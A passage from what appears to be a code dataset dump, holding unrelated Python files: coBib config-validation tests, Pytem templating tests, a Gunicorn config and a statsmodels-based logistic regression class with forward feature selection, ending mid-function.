content stringlengths 5 1.05M |
|---|
"""Tests for coBib's config validation."""
# pylint: disable=unused-argument, redefined-outer-name
import logging
import tempfile
from typing import Any, Generator, List
import pytest
from cobib.config import config
from cobib.config.config import Config
from .. import get_resource
EXAMPLE_LITERATURE = get_resource("example_literature.yaml")
def test_config_init() -> None:
    """Test the various ways of constructing a `Config` object."""
    # Constructing without arguments or from an empty dict yields an empty config.
    assert Config() == {}
    assert Config({}) == {}
    # A non-empty dict is taken over verbatim.
    assert Config({"dummy": "test"}) == {"dummy": "test"}
    # Any non-dictionary argument must be rejected with a TypeError.
    for invalid in (True, 1, "", []):
        with pytest.raises(TypeError):
            Config(invalid)  # type: ignore
def test_config_getattr() -> None:
    """Test the automatic attribute generation."""
    cfg = Config()
    # Accessing an unknown attribute materializes an empty nested Config.
    generated = cfg.dummy
    assert isinstance(cfg.dummy, Config)
    assert generated == {}
def test_config_recursive_getattr() -> None:
    """Test the recursive attribute generation."""
    cfg = Config()
    # Chained access auto-creates nested Config objects at every level.
    nested = cfg.dummy.dummy
    assert isinstance(cfg.dummy, Config)
    assert isinstance(cfg.dummy.dummy, Config)
    assert nested == {}
def test_config_recursive_setattr() -> None:
    """Test the recursive attribute setting."""
    cfg = Config()
    # Assigning through a chained attribute creates the intermediate section.
    cfg.dummy.dummy = "test"
    assert isinstance(cfg.dummy, Config)
    assert cfg.dummy.dummy == "test"
    assert cfg.dummy == {"dummy": "test"}
def test_config_load() -> None:
    """Test loading another config file."""
    # debug.py points the database at the example literature resource.
    config.load(get_resource("debug.py"))
    assert config.database.file == str(EXAMPLE_LITERATURE)
def test_config_load_from_open_file() -> None:
    """Test loading another config from an open file."""
    # `load` accepts an already-open text stream as well as a path.
    with open(get_resource("debug.py"), "r", encoding="utf-8") as file:
        config.load(file)
    assert config.database.file == str(EXAMPLE_LITERATURE)
def test_config_load_nothing() -> None:
    """Test that nothing changes when no XDG files are present."""
    # Blank out both XDG lookup paths so `load` finds no file at all.
    Config.XDG_CONFIG_FILE = ""
    Config.LEGACY_XDG_CONFIG_FILE = ""
    config.load()
    # we manually call validate because load exits early
    config.validate()
def test_config_load_xdg() -> None:
    """Test loading a config from XDG path."""
    # Redirect the XDG path to the debug resource and load implicitly.
    Config.XDG_CONFIG_FILE = get_resource("debug.py")
    config.load()
    assert config.database.file == str(EXAMPLE_LITERATURE)
# TODO: remove legacy configuration support on 1.1.2022
def assert_legacy_config() -> None:
    """Assert the legacy configuration has been applied.

    Checks one representative setting from every section touched by the
    legacy INI loader (commands, database, parsers, tui).
    """
    assert config.commands.edit.default_entry_type == "string"
    assert config.commands.open.command == "string"
    assert config.commands.search.grep == "string"
    assert config.commands.search.ignore_case is True
    assert config.database.file == "string"
    assert config.database.git is True
    assert config.parsers.bibtex.ignore_non_standard_types is True
    assert config.tui.default_list_args == ["string"]
    assert config.tui.prompt_before_quit is False
    assert config.tui.reverse_order is False
    assert config.tui.scroll_offset == 5
    assert config.tui.colors.cursor_line_fg == "black"
    assert config.tui.key_bindings.prompt == "p"
def test_config_load_legacy() -> None:
    """Test loading a legacy config file."""
    config.load_legacy_config(get_resource("legacy_config.ini", "config"))
    # first, it must pass the validation test
    config.validate()
    # then we also check that all settings have been changed somehow
    assert_legacy_config()
def test_config_load_legacy_xdg() -> None:
    """Test loading a legacy config from XDG path."""
    # Only the legacy XDG path is set, forcing the legacy loader to run.
    Config.XDG_CONFIG_FILE = ""
    Config.LEGACY_XDG_CONFIG_FILE = get_resource("legacy_config.ini", "config")
    config.load()  # validation is done internally
    # then we also check that all settings have been changed somehow
    assert_legacy_config()
def test_config_example() -> None:
    """Test that the example config matches the default values."""
    # Start from a blank config so only the example file's values remain.
    config.clear()
    config.load(get_resource("example.py", "../src/cobib/config/"))
    assert config == Config.DEFAULTS
def test_config_validation_failure(caplog: pytest.LogCaptureFixture) -> None:
    """Test for a `SystemExit` upon config validation failure.

    Args:
        caplog: the built-in pytest fixture.
    """
    with pytest.raises(SystemExit):
        config.load(get_resource("broken_config.py", "config"))
    # The exact validation error must have been logged before exiting.
    assert (
        "cobib.config.config",
        logging.ERROR,
        "config.database.file should be a string.",
    ) in caplog.record_tuples
@pytest.fixture
def setup() -> Generator[Any, None, None]:
    """Setup debugging configuration.

    Yields:
        Access to the local fixture variables.
    """
    config.load(get_resource("debug.py"))
    yield setup
    # Teardown: reset the global config back to its default state.
    config.clear()
    config.defaults()
def test_config_validation(setup: Any) -> None:
    """Test that the initial configuration passes all validation checks.

    Args:
        setup: a local pytest fixture.
    """
    config.validate()
# One parametrization per (section path, field) pair covering every
# validated configuration setting.
@pytest.mark.parametrize(
    ["sections", "field"],
    [
        [["logging"], "logfile"],
        [["logging"], "version"],
        [["commands", "edit"], "default_entry_type"],
        [["commands", "edit"], "editor"],
        [["commands", "open"], "command"],
        [["commands", "search"], "grep"],
        [["commands", "search"], "grep_args"],
        [["commands", "search"], "ignore_case"],
        [["database"], "file"],
        [["database"], "git"],
        [["database", "format"], "label_default"],
        [["database", "format"], "label_suffix"],
        [["database", "format"], "suppress_latex_warnings"],
        [["database", "stringify", "list_separator"], "file"],
        [["database", "stringify", "list_separator"], "tags"],
        [["database", "stringify", "list_separator"], "url"],
        [["parsers", "bibtex"], "ignore_non_standard_types"],
        [["parsers", "yaml"], "use_c_lib_yaml"],
        [["tui"], "default_list_args"],
        [["tui"], "prompt_before_quit"],
        [["tui"], "reverse_order"],
        [["tui"], "scroll_offset"],
        [["tui", "colors"], "cursor_line_fg"],
        [["tui", "colors"], "cursor_line_bg"],
        [["tui", "colors"], "top_statusbar_fg"],
        [["tui", "colors"], "top_statusbar_bg"],
        [["tui", "colors"], "bottom_statusbar_fg"],
        [["tui", "colors"], "bottom_statusbar_bg"],
        [["tui", "colors"], "search_label_fg"],
        [["tui", "colors"], "search_label_bg"],
        [["tui", "colors"], "search_query_fg"],
        [["tui", "colors"], "search_query_bg"],
        [["tui", "colors"], "popup_help_fg"],
        [["tui", "colors"], "popup_help_bg"],
        [["tui", "colors"], "popup_stdout_fg"],
        [["tui", "colors"], "popup_stdout_bg"],
        [["tui", "colors"], "popup_stderr_fg"],
        [["tui", "colors"], "popup_stderr_bg"],
        [["tui", "colors"], "selection_fg"],
        [["tui", "colors"], "selection_bg"],
        [["tui", "key_bindings"], "prompt"],
        [["tui", "key_bindings"], "search"],
        [["tui", "key_bindings"], "help"],
        [["tui", "key_bindings"], "add"],
        [["tui", "key_bindings"], "delete"],
        [["tui", "key_bindings"], "edit"],
        [["tui", "key_bindings"], "filter"],
        [["tui", "key_bindings"], "modify"],
        [["tui", "key_bindings"], "open"],
        [["tui", "key_bindings"], "quit"],
        [["tui", "key_bindings"], "redo"],
        [["tui", "key_bindings"], "sort"],
        [["tui", "key_bindings"], "undo"],
        [["tui", "key_bindings"], "select"],
        [["tui", "key_bindings"], "wrap"],
        [["tui", "key_bindings"], "export"],
        [["tui", "key_bindings"], "show"],
        [["utils", "file_downloader"], "default_location"],
        [["utils", "file_downloader"], "url_map"],
        [["utils"], "journal_abbreviations"],
    ],
)
def test_missing_config_fields(setup: Any, sections: List[str], field: str) -> None:
    """Test raised RuntimeError for missing config fields.

    Args:
        setup: a local pytest fixture.
        sections: a list of section names in the nested configuration.
        field: the name of the configuration setting.
    """
    with pytest.raises(RuntimeError) as exc_info:
        # Walk down to the parent section, delete the field, then validate.
        section = config
        for sec in sections[:-1]:
            section = section[sec]
        del section[sections[-1]][field]
        config.validate()
    # The error message must name the full dotted path of the missing field.
    assert f"config.{'.'.join(sections)}.{field}" in str(exc_info.value)
@pytest.mark.parametrize(
    ["color"],
    [
        ["cursor_line_fg"],
        ["cursor_line_bg"],
        ["top_statusbar_fg"],
        ["top_statusbar_bg"],
        ["bottom_statusbar_fg"],
        ["bottom_statusbar_bg"],
        ["search_label_fg"],
        ["search_label_bg"],
        ["search_query_fg"],
        ["search_query_bg"],
        ["popup_help_fg"],
        ["popup_help_bg"],
        ["popup_stdout_fg"],
        ["popup_stdout_bg"],
        ["popup_stderr_fg"],
        ["popup_stderr_bg"],
        ["selection_fg"],
        ["selection_bg"],
    ],
)
def test_valid_tui_colors(setup: Any, color: str) -> None:
    """Test curses color specification validation.

    Asserts that assigning an unknown color name ("test") to any TUI color
    setting is rejected during validation.

    Args:
        setup: a local pytest fixture.
        color: the name of the color.
    """
    with pytest.raises(RuntimeError) as exc_info:
        config.tui.colors[color] = "test"
        config.validate()
    assert str(exc_info.value) == "Unknown color specification: test"
@pytest.mark.parametrize(
    ["color", "ansi"],
    [
        # Expected codes follow the "\x1b[<fg>;<bg>m" ANSI escape format.
        ["cursor_line", "\x1b[37;46m"],
        ["top_statusbar", "\x1b[30;43m"],
        ["bottom_statusbar", "\x1b[30;43m"],
        ["search_label", "\x1b[34;40m"],
        ["search_query", "\x1b[31;40m"],
        ["popup_help", "\x1b[37;42m"],
        ["popup_stdout", "\x1b[37;44m"],
        ["popup_stderr", "\x1b[37;41m"],
        ["selection", "\x1b[37;45m"],
    ],
)
def test_get_ansi_color(setup: Any, color: str, ansi: str) -> None:
    """Test default ANSI color code generation.

    Args:
        setup: a local pytest fixture.
        color: the name of the color.
        ansi: the expected ANSI code.
    """
    assert config.get_ansi_color(color) == ansi
def test_ignored_tui_color(setup: Any, caplog: pytest.LogCaptureFixture) -> None:
    """Test invalid TUI colors are ignored.

    Args:
        setup: a local pytest fixture.
        caplog: the built-in pytest fixture.
    """
    # An unknown color *name* (as opposed to an unknown value) is only warned about.
    config.tui.colors.dummy = "white"
    config.validate()
    assert (
        "cobib.config.config",
        logging.WARNING,
        "Ignoring unknown TUI color: dummy.",
    ) in caplog.record_tuples
@pytest.mark.parametrize(["setting", "value"], [[["database", "format", "month"], str]])
def test_deprecation_warning(
    setting: List[str], value: Any, caplog: pytest.LogCaptureFixture
) -> None:
    """Test logged warning for deprecated setting.

    Args:
        setting: the list of attribute names leading to the deprecated setting.
        value: a value to use for the deprecated setting.
        caplog: the built-in pytest fixture.
    """
    # Walk to the parent section and assign the deprecated setting.
    section = config
    for sec in setting[:-1]:
        section = section[sec]
    section[setting[-1]] = value
    config.validate()
    # for/else: fail only if no matching warning record was found.
    for source, level, message in caplog.record_tuples:
        if (
            source == "cobib.config.config"
            and level == logging.WARNING
            and f"The config.{'.'.join(setting)} setting is deprecated" in message
        ):
            break
    else:
        assert False, "Missing deprecation warning!"
@pytest.mark.parametrize(
    ["setting", "attribute"], [["[FORMAT]\nmonth=str", "database.format.month"]]
)
def test_deprecation_warning_legacy(
    setting: str, attribute: str, caplog: pytest.LogCaptureFixture
) -> None:
    """Test logged warning for deprecated setting.

    Args:
        setting: the legacy formatted string of the deprecated setting.
        attribute: the new formatted name of the deprecated setting.
        caplog: the built-in pytest fixture.
    """
    # Write the legacy INI snippet to a temp file and load it by name.
    with tempfile.NamedTemporaryFile("w") as legacy_file:
        legacy_file.write(setting)
        legacy_file.seek(0)
        config.load_legacy_config(legacy_file.name)
    config.validate()
    # for/else: fail only if no matching warning record was found.
    for source, level, message in caplog.record_tuples:
        if (
            source == "cobib.config.config"
            and level == logging.WARNING
            and f"The config.{attribute} setting is deprecated" in message
        ):
            break
    else:
        assert False, "Missing deprecation warning!"
|
from __future__ import print_function
import os, sys
from .pytem import Pytem
def print_err(*args):
    """Print *args* to stderr, space-separated like the built-in print."""
    print(" ".join(map(str, args)), file=sys.stderr)
# Module-level Pytem renderer shared by every test below.
subject = Pytem("template",'globalfile')
def tag_test():
    """A %title% tag is filled from the front matter and wrapped in <p>."""
    rendered = subject.render_string("title : Title---%title%")
    print_err(rendered)
    assert rendered == "<p>Title</p>"
def md_test():
    """Markdown after the delimiter is converted to HTML."""
    rendered = subject.render_string("---#Hello World")
    print_err(rendered)
    assert rendered == "<h1>Hello World</h1>"
def dual_delim_test():
    """Only the first delimiter splits front matter; later ones are literal."""
    rendered = subject.render_string("title : Title---%title%---More Content")
    print_err(rendered)
    assert rendered == "<p>Title---More Content</p>"
def site_test():
    """Render the whole site from 'in' to 'out' with prompting disabled."""
    # Disable interactive prompts before rendering.
    os.environ["PROMPT"] = "no"
    return subject.render_site("in","out")
|
# Gunicorn server configuration.
# NOTE(review): `multiprocessing` is unused here — it is commonly imported to
# size `workers` from cpu_count(); confirm before removing.
import multiprocessing
bind = "0.0.0.0:5000"  # listen on all interfaces, port 5000
workers = 1  # number of worker processes
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.metrics import roc_auc_score, classification_report, confusion_matrix
from sklearn.model_selection import cross_validate
from pandas.api.types import is_numeric_dtype
import statsmodels.api as sm
import warnings
import time
from sklearn.linear_model import LogisticRegression
class LogisticRegressionClass:
def __init__(self,df,response,sig_level=0.05,max_iter=500,cols_to_keep_static=[],cols_to_try_individually=[],
regularization_C=None):
'''
:param df: a dataframe
:param response: a string. This must be an existing column in df
:param sig_level: a float. The significance level the forward selection will use
:param max_iter: an integer. The maximum iterations the solvers will use to try to converge
:param cols_to_keep_static: a list. Used in forward selection to not omit these columns
:param cols_to_try_individually: a list. The columns to test in a regression one at a time to identify which
one has the greatest relationship with the response controlled for the cols_to_keep_static
:param C: Regularisation contant for the l1 regulatisation. The weight multiplying the penalty term
'''
# attach attributes to the object
self.df = df.copy()
self.response = response
self.sig_level = sig_level
self.max_iter=max_iter
self.warnings = ''
self.error_message = ''
self.cols_to_keep_static = cols_to_keep_static
self.cols_to_try_individually = cols_to_try_individually
self.regularization_C = regularization_C
self.exception_message = None
if regularization_C is None:
self.sklearn_model = LogisticRegression(max_iter=self.max_iter)
else:
self.sklearn_model = LogisticRegression(max_iter=self.max_iter, penalty='l1',
C=1 / (self.regularization_C + 0.000000001), solver='liblinear')
def prepare_data(self,df,response):
y = df[response]
X = df[list(filter(lambda x: x != response, df.columns))]
X = sm.add_constant(X, has_constant='add')
return X, y
def logistic_regression_utility_check_response(self,series):
if (len(series.unique()) > 2):
self.error_message = 'The response variable has more than 2 categories and is not suitable for logistic regression'
print('The response variable has more than 2 categories and is not suitable for logistic regression')
return False
if (not is_numeric_dtype(series)):
self.error_message = self.error_message + '\n' + 'The response variable should be binary 0 and 1 and numeric type (i.e. int)'
print('The response variable should be binary 0 and 1 and numeric type (i.e. int)')
return False
return True
def log_reg_diagnostic_performance(self,X=None,y=None):
if X is None:
try:
X = self.X_with_feature_selection
y = self.y_with_feature_selection
except:
X = self.X
y = self.y
# cvs = cross_validate(LogisticRegression(max_iter=self.max_iter), X, y, cv=5,
# scoring=['accuracy', 'f1', 'precision', 'recall', 'roc_auc'])
cvs = cross_validate(self.sklearn_model, X, y, cv=5,
scoring=['accuracy', 'f1', 'precision', 'recall', 'roc_auc'])
s = """Performance (0 is negative 1 is positive)\n5-Fold Cross Validation Results:\nTest Set accuracy = {}\nf1 = {}\nprecision = {}\nrecall = {}\nauc = {}""".format(
round(cvs['test_accuracy'].mean(), 2), round(cvs['test_f1'].mean(), 2),
round(cvs['test_precision'].mean(), 2),
round(cvs['test_recall'].mean(), 2), round(cvs['test_roc_auc'].mean(), 2))
self.performance = s
self.performance_df = pd.DataFrame(data=[round(cvs['test_accuracy'].mean(), 2), round(cvs['test_f1'].mean(), 2),
round(cvs['test_precision'].mean(), 2),
round(cvs['test_recall'].mean(), 2), round(cvs['test_roc_auc'].mean(), 2)],
index=['test_accuracy','test_f1','test_precision','test_recall','test_roc_auc'],
columns=['Score'])
return s
def log_reg_diagnostic_correlations(self,X=None):
print("Correlations")
if X is None:
try:
X = self.X_with_feature_selection
except:
X = self.X
fig = plt.figure(figsize=(10, 10))
ax = fig.add_subplot(1, 1, 1)
upp_mat = np.triu(X.corr())
sns.heatmap(X.corr(), vmin=-1, vmax=+1, annot=True, cmap='coolwarm', mask=upp_mat, ax=ax)
self.fig_correlations = fig
self.ax_correlations = ax
return fig,ax
def logistic_regression_get_report(self,model=None,X=None,y=None,verbose=True):
if model is None:
try:
model = self.result_with_feature_selection
except:
model = self.result
if X is None:
try:
X = self.X_with_feature_selection
y = self.y_with_feature_selection
except:
X = self.X
y = self.y
preds = model.predict(X)
df_classification_report = pd.DataFrame(classification_report(y, preds>0.5, output_dict=True))
df_confusion = pd.DataFrame(confusion_matrix(y, preds>0.5))
df_confusion.index = list(map(lambda x: 'True_' + str(x), df_confusion.index))
df_confusion.columns = list(map(lambda x: 'Predicted_' + str(x), df_confusion.columns))
if verbose:
print("Classification Report")
print(df_classification_report)
print("Confusion Matrix")
print(df_confusion)
self.df_confusion = df_confusion
self.df_classification_report = df_classification_report
return df_confusion
def prepare_categories(self,df, response, drop=False):
cat_cols = list(filter(lambda x: not is_numeric_dtype(df[x]), df.columns))
cat_cols = list(set(cat_cols) - {response} - set(self.cols_to_keep_static))
df = pd.get_dummies(df, columns=cat_cols, drop_first=drop)
df = pd.get_dummies(df, columns=self.cols_to_keep_static, drop_first=True)
self.cols_to_keep_static_dummified = []
for col in self.cols_to_keep_static:
for col_dummy in df.columns:
if col in col_dummy:
self.cols_to_keep_static_dummified.append(col_dummy)
return df
    def get_interpretation(self, result=None, feature_list=None, df=None):
        '''
        Given a trained model, calculate the average probabilities due to feature changes

        :param result: a fitted statsmodels result; defaults to the feature-selected
            result, then self.result, then self.basic_result
        :param feature_list: the feature names the result was trained on
        :param df: the raw (un-dummified) dataframe to evaluate on; defaults to self.df
        :return: self.feature_interpretability_df, a DataFrame of average predicted
            probabilities per feature change (also stored on the instance)
        '''
        if (result is None) or (feature_list is None):
            try:
                feature_list = self.X_with_feature_selection.columns
                result = self.result_with_feature_selection
            except:  # NOTE(review): bare except — intended fallback chain when no feature selection ran
                feature_list = self.X.columns
                try:
                    result = self.result
                except:
                    result = self.basic_result
        # take a copy of the original df and prepare the dataset
        if df is None:
            df = self.df.copy()
        df_temp = df.copy()
        df_temp = self.prepare_categories(df_temp, self.response, drop=False)
        X, y = self.prepare_data(df_temp, self.response)
        full_feature_list = list(feature_list)
        if 'const' not in full_feature_list:
            full_feature_list = ['const'] + full_feature_list
        # comparative uplift section
        comparative_dict = dict()
        for col1 in df.columns:
            for col2 in full_feature_list:
                # if this feature was dummified
                if col1 + '_' in col2:
                    t = X[full_feature_list].copy()
                    # First get prediction with 0
                    t[col2] = 0
                    comparative_dict[col2] = [result.predict(t).mean()]
                    # Then get prediction with 1
                    t[col2] = 1
                    comparative_dict[col2].append(result.predict(t).mean())
                elif col1 == col2:
                    t = X[full_feature_list].copy()
                    # first get prediction with average
                    t[col2] = t[col2].mean()
                    comparative_dict[col2] = [result.predict(t).mean()]
                    # then get prediction with +1
                    t[col2] = t[col2] + 1
                    comparative_dict[col2].append(result.predict(t).mean())
        feature_interpretability_comparative_df = pd.DataFrame(comparative_dict).T
        feature_interpretability_comparative_df.columns = ['Prediction_average_or_without', 'Prediction_add1_or_with']
        feature_interpretability_comparative_df['diff'] = feature_interpretability_comparative_df['Prediction_add1_or_with'] - feature_interpretability_comparative_df['Prediction_average_or_without']
        self.feature_interpretability_comparative_df = feature_interpretability_comparative_df
        # get a base probability (this is just the average probability)
        base_probability = result.predict(X[full_feature_list]).mean()
        probability_dict = dict()
        probability_dict['base'] = base_probability
        # for each column in the original df
        for col in df.columns:
            # for each column in the result's feature list
            for col2 in feature_list:
                # check if this feature was dummified from this column
                if col + '_' in col2:
                    # if this feature was dummified from this column then update this column to be this feature value
                    df_temp = df.copy()
                    df_temp[col] = col2.replace(col + '_', '')
                    df_temp = self.prepare_categories(df_temp, self.response, drop=False)
                    X, y = self.prepare_data(df_temp, self.response)
                    # check that all features the model is expecting exist in X
                    for col3 in feature_list:
                        if col3 not in X.columns:
                            X[col3] = 0
                    # calculate the probability
                    probability = result.predict(X[full_feature_list]).mean()
                    probability_dict[col2] = probability
                elif col == col2:
                    # if this column was not dummified then it is numeric so add 1 to it
                    df_temp = df.copy()
                    df_temp[col] = df_temp[col] + 1
                    df_temp = self.prepare_categories(df_temp, self.response, drop=False)
                    X, y = self.prepare_data(df_temp, self.response)
                    probability = result.predict(X[full_feature_list]).mean()
                    probability_dict[col2] = probability
        # save the probability dictionary
        self.feature_interpretability_dict = probability_dict
        self.feature_interpretability_df = pd.DataFrame(data=probability_dict.values(), index=probability_dict.keys(), columns=['Probability'])
        return self.feature_interpretability_df
    def log_reg_basic(self, df=None):
        '''
        Run a basic logistic regression model

        Fits a statsmodels Logit on the prepared data (regularized when
        self.regularization_C is set), stores the fitted result/model and the
        X/y used, and returns the fitted result.
        '''
        if df is None:
            df = self.df
        X, y = self.prepare_data(df, self.response)
        model = sm.Logit(y, X)
        if self.regularization_C is None:
            result = model.fit(disp=0, maxiter=self.max_iter)
        else:
            # L1-regularized fit; alpha is the penalty weight.
            result = model.fit_regularized(disp=0, maxiter=self.max_iter, alpha=self.regularization_C)
        self.basic_result = result
        self.basic_model = model
        self.X = X
        self.y = y
        return result
def predict_from_original(self,df):
df = self.prepare_categories(df, self.response, drop=False)
try:
all_cols = list(self.X_with_feature_selection.columns)
except:
all_cols = list(self.X.columns)
if 'const' not in df.columns:
df['const'] = 1
for col in all_cols:
if col not in df.columns:
df[col] = 0
try:
res = self.result_with_feature_selection
except:
res = self.result
return res.predict(df[all_cols])
    def log_reg(self, df=None):
        """Run logistic regression after dropping NaN rows and dummifying categoricals.

        Warns (and records in self.warnings) when NaN rows are dropped. Returns
        None if the response fails the binary/numeric check, otherwise the
        fitted result (also stored on self.result).
        """
        if df is None:
            df1 = self.df[~self.df.isna().any(axis=1)].copy()
            if len(df1) < len(self.df):
                warning_message = 'There are NaNs in the dataset. After removing NaNs, the rows reduce from {} to {}'.format(len(self.df), len(df1))
                warnings.warn(warning_message)
                print(warning_message)
                self.warnings = self.warnings + '\n' + warning_message
        else:
            df1 = df[~df.isna().any(axis=1)].copy()
            if len(df1) < len(df):
                warning_message = 'There are NaNs in the dataset. After removing NaNs, the rows reduce from {} to {}'.format(
                    len(df),
                    len(df1))
                warnings.warn(warning_message)
                print(warning_message)
                self.warnings = self.warnings + '\n' + warning_message
        if not self.logistic_regression_utility_check_response(df1[self.response]):
            return None
        # drop=True: drop the first dummy level to avoid perfect collinearity
        df1 = self.prepare_categories(df1, self.response, drop=True)
        result = self.log_reg_basic(df1)
        self.result = result
        self.model = self.basic_model
        return result
    def log_reg_with_feature_selection(self, df=None, run_for=0, verbose=True, max_pr2=None, max_features=None):
        """Greedy forward feature selection by pseudo-R2 with significance gating.

        Repeatedly adds the candidate column that most improves prsquared while
        its p-value stays within self.sig_level. Stops when no candidate helps,
        or when max_pr2 / max_features / the run_for time budget is hit.
        Returns the final fitted result (or None/early-return on failure).
        """
        # NOTE(review): this local import shadows the module-level `warnings`
        # import within this method; harmless but redundant — confirm intent.
        import warnings
        self.params_with_convergence_errors = []
        # start the timer in case the is a time limit specified
        start_time = time.time()
        n_features = 0
        if df is None:
            # get rid of nans. There should be no nans. Imputation should be performed prior to this point
            df1 = self.df[~self.df.isna().any(axis=1)].copy()
            # show a warning to let the user know of the droppped nans
            if len(df1) < len(self.df):
                warning_message = 'There are NaNs in the dataset. After removing NaNs, the rows reduce from {} to {}'.format(
                    len(self.df),
                    len(df1))
                warnings.warn(warning_message)
                print(warning_message)
                self.warnings = self.warnings + '\n' + warning_message
        else:
            # get rid of nans. There should be no nans. Imputation should be performed prior to this point
            df1 = df[~df.isna().any(axis=1)].copy()
            # show a warning to let the user know of the droppped nans
            if len(df1) < len(df):
                warning_message = 'There are NaNs in the dataset. After removing NaNs, the rows reduce from {} to {}'.format(
                    len(df),
                    len(df1))
                warnings.warn(warning_message)
                print(warning_message)
                self.warnings = self.warnings + '\n' + warning_message
        # check that the response is in the correct format to perform logistic regression
        if not self.logistic_regression_utility_check_response(df1[self.response]):
            return None
        # automatically identify categorical variables and dummify them
        df1 = self.prepare_categories(df1, self.response, drop=False)
        # raise a warning if the number of columns surpasses the number of rows
        if len(df1.columns) > len(df1):
            warnings.warn(
                'Note: The number of columns after getting dummies is larger than the number of rows. n_cols = {}, nrows = {}'.format(
                    len(df1.columns), len(df1)))
            print(
                'Note: The number of columns after getting dummies is larger than the number of rows. n_cols = {}, nrows = {}'.format(
                    len(df1.columns), len(df1)))
        # the initial list of features
        remaining = list(set(df1.columns) - {self.response} - set(self.cols_to_keep_static_dummified))
        # this holds the tried and successful feature set
        full_feature_set = self.cols_to_keep_static_dummified
        # get the first logistic regression output for only the constant/base model
        first_result = self.log_reg_basic(df1[[self.response]])
        # save the model and the X and y used to train it
        self.X_with_feature_selection = self.X.copy()
        self.y_with_feature_selection = self.y.copy()
        self.model_with_feature_selection = self.basic_model
        # get the pseudo r2 of the base model
        prsquared = first_result.prsquared
        # store the result of the first model
        final_result = first_result
        # while there are still remaining features to try keep looping
        while len(remaining) > 0:
            # store the last pseudo r2 value
            last_prsquared = prsquared
            # the next feature to add to the full feature set
            next_col = None
            # the result corresponding to the addition of the next col
            next_result = None
            # try adding each column from the remaining columns
            for col in sorted(remaining):
                # add the next column to the feature set and try it out. Try except is added because sometimes
                # when categorical variables are dummified and you add both variables you get a singular matrix
                this_feature_set = full_feature_set + [col]
                try:
                    with warnings.catch_warnings():
                        warnings.filterwarnings("ignore")
                        result = self.log_reg_basic(df1[this_feature_set + [self.response]])
                except Exception as e:
                    self.exception_message = e
                    self.params_with_convergence_errors.append(col)
                    # safe: we iterate over sorted(remaining), a copy
                    remaining.remove(col)
                    continue
                # the resulting pseudo r2 from this fit
                this_prsquared = result.prsquared
                # if a feature results in nan for pseudo r2 skip it
                # NOTE(review): `is np.nan` is an identity check and may miss
                # NaNs produced by computation; np.isnan() would be robust — confirm.
                if this_prsquared is np.nan:
                    print('Note: Feature {} is resulting with a nan adjusted r2. Skipping feature'.format(col))
                    continue
                # this feature is recorded as a candidate if the conditions are met
                if (this_prsquared > last_prsquared) and (result.pvalues.loc[col] <= self.sig_level):
                    last_prsquared = this_prsquared
                    next_col = col
                    next_result = result
                    # save the model and the X and y used to train it
                    self.X_with_feature_selection = self.X.copy()
                    self.y_with_feature_selection = self.y.copy()
                    self.model_with_feature_selection = self.basic_model
            # if after the loop no new candidates were found then we stop looking
            if next_col is None:
                break
            # add the candidate to the permanent list
            full_feature_set.append(next_col)
            n_features = n_features + 1
            # show progress
            if verbose:
                print('********Adding {} with prsquared = {}********'.format(next_col, last_prsquared))
            # store the result
            final_result = next_result
            # remove the chosen candidate from the remaining features
            remaining.remove(next_col)
            # if the user has specified a max r2 then stop if it has been reached
            if (max_pr2 is not None) and (max_pr2 <= last_prsquared):
                break
            # if the user has specified a max number of features then stop if it has been reached
            if (max_features is not None) and (max_features <= n_features):
                break
            # check if it's not taking too long
            if (time.time() - start_time > run_for) and (run_for > 0):
                print(
                    'Aborting: Has been running for {}s > {}s. {} out of {} columns left. There are probably too many categories in one of the columns'.format(
                        round(time.time() - start_time, 2), run_for, len(remaining), len(df1.columns) - 1))
                return
        self.final_feature_set = full_feature_set
        self.result_with_feature_selection = final_result
        if (len(self.params_with_convergence_errors) > 0) & verbose:
            print('There were converge errors. See params_with_convergence_errors for the list of columns')
        return final_result
    def log_reg_one_at_a_time(self, with_feature_selection=False, get_interpretability=False):
        """Regress the response on each candidate column individually.

        Each column from self.cols_to_try_individually is fit alongside the
        static columns; coefficients and p-values (plus probabilities if
        get_interpretability) are collected into self.df_one_at_a_time, which
        is also returned.
        """
        dic = dict()
        df1 = self.df.copy()
        df1 = df1[[self.response] + self.cols_to_keep_static + self.cols_to_try_individually].copy()
        for this_col_to_try in self.cols_to_try_individually:
            if with_feature_selection:
                result = self.log_reg_with_feature_selection(df=df1[self.cols_to_keep_static + [self.response, this_col_to_try]])
                if get_interpretability:
                    self.get_interpretation(self.result_with_feature_selection, self.final_feature_set
                                            , df=df1[self.cols_to_keep_static + [self.response, this_col_to_try]])
            else:
                result = self.log_reg(df=df1[self.cols_to_keep_static + [self.response, this_col_to_try]])
                if get_interpretability:
                    self.get_interpretation(self.result, self.X.columns
                                            , df=df1[self.cols_to_keep_static + [self.response, this_col_to_try]])
            # collect every fitted parameter derived from this column (incl. dummies)
            for col in list(filter(lambda x: this_col_to_try in x, result.params.index)):
                if get_interpretability:
                    dic[col] = [result.params[col], result.pvalues[col], self.feature_interpretability_df['Probability'][col],
                                self.feature_interpretability_df['Probability']['base']]
                else:
                    dic[col] = [result.params[col], result.pvalues[col]]
        df_one_at_a_time = pd.DataFrame(dic).T
        if get_interpretability:
            df_one_at_a_time.columns = ['Coefficient', 'Pvalue', 'Controlled Probability', 'Base Probability']
        else:
            df_one_at_a_time.columns = ['Coefficient', 'Pvalue']
        self.df_one_at_a_time = df_one_at_a_time
        return df_one_at_a_time
def unit_test_1():
    """Regression-test log_reg_basic and interpretation on the titanic dataset.

    Requires Data/titanic/titanic.csv relative to the parent of sys.path[0].
    All comparisons are rounded to 2 decimals for stability.
    """
    print('Unit test 1...')
    import sys
    import os
    import warnings
    np.random.seed(101)
    #warnings.filterwarnings("ignore")
    current_dir = '/'.join(sys.path[0].split('/')[:-1])  # sys.path[0]
    data_dir = os.path.join(current_dir, 'Data', 'titanic')
    titanic_csv = os.path.join(data_dir, 'titanic.csv')
    df = pd.read_csv(titanic_csv)
    df['Sex'] = df['Sex'].map({'male': 0, 'female': 1})
    df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare']]
    df = df.dropna()
    my_logistic_regresion_class = LogisticRegressionClass(df, 'Survived', sig_level=0.05)
    my_logistic_regresion_class.log_reg_basic()
    # Expected fitted coefficients (order-insensitive, rounded).
    result_required = [2.75415827153399, -1.2422486253277711, 2.6348448348873723, -0.043952595897772694, -0.375754870508454, -0.06193736644803373, 0.002160033540727779]
    result_actual = list(my_logistic_regresion_class.basic_result.params)
